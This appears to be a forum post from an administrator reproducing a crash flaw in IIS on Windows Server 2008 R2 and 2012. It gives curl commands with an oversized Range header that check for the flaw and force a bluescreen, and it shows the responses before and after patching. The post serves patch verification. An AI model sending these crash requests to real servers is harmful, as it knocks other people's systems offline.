I can confirm on Windows 2K8R2 and 2K12, with Kernel Caching enabled (as per default IIS settings) and without any Kernel Caching rules, that I can reproduce the issue using the cURL method.
Steps to reproduce.
Check server is vulnerable
curl -v http://blah.com/ -H "Range: bytes=00-18446744073709551615"
Steps to reproduce.
Check server is vulnerable curl -v http://blah.com/ -H "Range: bytes=00-18446744073709551615"
You should see a Error 416.
Force crash curl -v http://blah.com/images/blah.jpg -H "Range: bytes=100-18446744073709551615" --and/or-- curl -v http://blah.com/images/blah.jpg -H "Range: bytes=40-18446744073709551615"
Note above: You have to specifically address a file AND use byte range 40 or 100 in my setup to make it bluescreen.
After Patching - Check Vulnerability curl -v http://blah.com/ -H "Range: bytes=00-18446744073709551615"
Response: Error 400: The request has an invalid header name
After Patching - Force Crash Test
curl -v http://blah.com/images/blah.jpg -H "Range: bytes=100-18446744073709551615"
Response: 206 Partial Content
Hope that helps.